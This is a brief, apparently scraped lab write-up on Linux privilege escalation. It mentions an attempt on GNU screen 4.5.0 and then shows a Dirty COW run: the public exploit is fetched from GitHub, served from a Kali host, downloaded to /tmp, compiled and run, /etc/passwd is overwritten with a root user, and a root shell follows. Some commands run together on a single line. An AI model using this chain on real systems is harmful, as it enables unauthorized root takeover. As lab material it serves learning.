Privilege escalation












Trying to exploit GNU screen 4.5.0


Trying Dirty Cow attack

Last updated















Last updated
which gccwget https://raw.githubusercontent.com/firefart/dirtycow/refs/heads/master/dirty.c
python3 -m http.server 80cd /tmp && wget http://$IP_KALI/dirty.cgcc -pthread dirty.c -o dirty -lcrypt
./dirtywww-data@offsecsrv:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: admin
Complete line:
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash
mmap: b7861000
su firefart
# Password: admin